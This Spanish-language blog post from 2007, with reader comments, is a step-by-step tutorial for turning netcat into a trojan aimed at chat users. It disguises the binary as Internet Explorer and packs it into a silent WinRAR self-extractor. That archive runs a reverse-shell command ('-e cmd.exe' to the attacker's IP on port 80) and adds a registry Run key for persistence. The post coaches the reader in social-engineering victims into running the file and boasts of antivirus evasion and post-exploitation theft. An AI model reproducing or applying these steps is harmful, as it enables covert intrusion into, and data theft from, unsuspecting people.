viernes, 22 de junio de 2007

TROYANIZANDO NETCAT


TROYANIZANDO NETCAT by WHK

Como ya saben, con netcat puedes tomar una shell directamente o realizar una conexión inversa indicando mi IP o dirección DNS (para los que no saben lo que es un DNS… es un tipo de traducción que hace mas fácil poder encontrar tu PC, por ejemplo la IP 200.32.22.25 sería el DNS = pagina.cl ).

Bueno… primero hay que saber lo que vamos a hacer… la idea principal será tomar una shell de la PC de cualquier persona de un IRC (Chat).

Materiales:
ResHacker
Netcat v1.1
Winrar (Modo grafico)
Un icono de Internet Explorer
.

Bueno, si no saben donde encontrar el icono tratare de dárselos con este documento XD si no se puede pueden usar cualquier otro icono (puedes hacerlo sin iconos también pero se verá sospechoso.)

Lo primero es conectarse a un Chat XD y conseguirse a alguna victima (ojala no lo hagan con sus novias porque si los pillan los van a patear XD ) … una ves que digan.. “esa es mi victimaaaaa!!!” entonces usaremos algo que se llama ingeniería social y es a través del ingenio propio hacerse pasar por alguien o hacerse de la amistad de esa persona para poder obtener lo que queremos, la idea es que hablaremos con el y bla bla bla de donde eres bla bla bla… cuando termines le dices que otro día seguimos conversando… si todo va bien ps ya mañana tendrás la confianza suficiente como para darle un programa que le ayudará en el mantenimiento de su PC o que simplemente se divierta con un juego XD.

Dejamos de lado el Chat y en la noche nos ponemos a hacer el troyano de la siguiente forma:

Paso 1: Primero le cambiamos el icono para que sea menos sospechoso con el ResHacker:




En primer lugar abres el ResHacker y le das en “File/Open” y buscas el netcat. Después pinchas en acción y luego en “Add a new Resource”, luego se verá la ventana que ves a la derecha y presionas donde dice “Open file with new resource” (paso 3) para buscar el icono que teniamos, luego donde dice “Resource Name” Debes escribir la palabra “ICON” tal como se ve en la foto y para finalizar presionamos en “Add Resource” y en “File/Save”. Con todo esto te creará un respaldo del netcat original que puedes borrarlo con toda tranquilidad y al refrescar la pantalla (F5) veras que el netcat tiene el mismo icono de Internet Explorer XD



Paso 2: renombramos nc.exe y desde ahora se llamará “iexplorer.exe” XD, luego pinchas el netcat con el botón derecho de tu Mouse y deberá aparecer algo así (obviamente después de haber instalado el winrar.)



Luego aparecerá el Winrar y empezaremos a crear nuestro troyano:

1.



Donde dice “Nombre del archivo” le escribimos “carnada.exe” (por ahora), el formato debe ser en “RAR” el método de compresión el mejor y por último y mas importante “Crear un archivo SFX”, el resto debe quedas deseleccionado.


2.



En la pestaña “Avanzado” (arriba) debes pinchar el botón llamado “Opciones SFX” y comenzaremos a configurar nuestro Winrar SFX.


3.



Ahora en “Carpeta de extracción” le diremos que descomprima el netcat (con nombre de iexplorer) en el directorio = %homedrive%%homepath%\update , ahora me diran: “Que es esto?!!”… %homedrive% significa que se descomprimirá dentro de la misma unidad de disco que esté Windows, o sea comúnmente (no siempre) “C:\” … %homepath% significa “Documents and settings\tu usuario actual” en conclusión se descomprimirá dentro del directorio raiz del usuario donde es casi el único lugar donde un usuario sin derechos de administrador puede sobrescribir, en otras palabras si le hubiese escrito %windir%\system32 pudiera haber tenido fallas al descomprimirse ya que no todos tienen derecho a ese directorio. Elegí una carpeta llamada update para llamar menos la atención.
En “Ejecutar tras la extracción” le escribimos esto = iexplorer.exe -d -e cmd.exe [aca va nuestra ip] 80 , yo le puse la dirección 127.0.0.1 para pruebas pero ustedes le ponen la ip real que sale a Internet. 80 es el puerto donde el troyano se conectará con nosotros.

En “Ejecutar antes de la extracción” le escribimos lo siguiente = %windir%\system32\cmd /c reg add HKcU\Software\Microsoft\Windows\CurrentVersion\Run /v "iexplorer" /t REG_SZ /d "%homedrive%%homepath%\update\iexplorer.exe -d -e cmd.exe 127.0.0.1 80" /f > nul … y ustedes me diran que es eso!!!!... le decimos que ejecute la consola de comandos CMD y llame a un ejecutable llamado “REG.EXE” el cual se encargará de agregar nuestra entrada al registro del sistema para que el troyano arranque solito cada ves que encienda la pc (recordar que donde dice 127.0.0.1 deben poner la ip de ustedes o en algunos casos (para los que saben) su DNS… es mas efectivo. (Consultar por el no-ip) y donde dice >nul significa que la victima no verá mas que un simple pestañazo del DOS en ves de mostrar todo lo que se está ejecutando.


4.



Acá estamos pidiendo a winrar que no muestre nada mientras se instala todo esto, asi será mas silencioso, rápido y automatizado.


5.



Yo le puse icono de yahoo porque lo voy a probar desde el mismo Chat.


Ahora vamos a crear el programa que nos conectará con la victima, y se llama “Cliente”
Solo ejecutamos esto y estaremos listos para recibir la conexión de quien abra la carnada:



Y listo ahora solo falta visitar a nuestro amigo del día anterior y decirle que tienes un juego muy chido o que tienes algo para no se… usa tu imaginación. En mi caso y entré a una sala de yahoo y como hoy en día esta muy de moda los booters XD puse en sala que bajaran un antibooter para que no los pudieran sacar de la sala y les pase un link con la dirección donde estaba alojado el troyano. En resumidas cuentas… si alguien cae en tus maldades te debe aparecer esto:



Habrás tomado la shell de otra PC (manejar una shell de otra pc significa poder controlar el DOS de Windows o la shell de GNU.. es poder controlar la consola de comandos de la otra persona y a través de eso puedes subirle archivos, borrarle cosas, darle troyanos que te permitan ver su escritorio… mirar sus contraseñas volcando el registro en textos y haciéndoles un “type”… para los que saben un poquitito mas.. talvez saltar a otras pc con netbios, exploits como el dcom, acceder a servidores y dominar una red completa y ufff.. a volar la imaginación. Si no me creen miren estas tres capturas jugando con netcat XD nada serio:


1. El sueño de todo lamer XD :




2. Subiendo RealVnc4 para poder hacer una conexión inversa y mirar el escritorio de la otra persona(tutorial mas abajo):




3. Esto fue un ajuste de cuentas XD:



NOTA: Los archivos borrados en la shell no van a la papelera, son eliminados totalmente

Les mostré como crear un troyano con netcat (indetectable por todos los antivirus por ahora) también puede hacerse con una conexión directa en ves de una inversa como la hice acá, así como ya saben hacerlo

Esto es todo y espero poder mostrarles la próxima ves.. como convertir el Netcat v1.1 en un cliente SMTP para enviar correos automatizados y temporizados además de servir como cliente FTP con comandos automatizados sin la necesidad de la intervención de escribir los comandos desde la consola, también como ponerle contraseña a una sesión de shell con netcat entre muchas otras cosas mas


Salu2 Att. Yan.
Unilola Software.

6 comentarios:

Anónimo dijo...

Hola, soy WHK y veo que las imagenes ya no están en el servidor de subirimagenes.com asi que puedes volver a linkearlas directamente desde mi web: http://whk.sitehacking.net/
;) Salu2.

Grave dijo...

Gracias por avisar las cambiare cuando tenga tiempo, no sabia que conocias esta pagina xD, no la publico en ningun lado porque la ocupo principalmente para guardar informacion importante que pueda perderse.

Sonic Vempyr dijo...

Hola, tu información me ha servido de mucho, muchas gracias

se ve que eres un experto en la materia!!

por otra parte, podrías resubir las imágenes por favor??, es que no las veo, como que ya no están en el servidor, es que necesito verlas para guiarme

Muchas gracias!!

Jhon dijo...

Podrías resubir las imagenes prfavor?

Anónimo dijo...

podrias subir nuevamente las imagenes por favor.-

Anónimo dijo...

sipo estupido el problema con la ip dinamica resuelvelño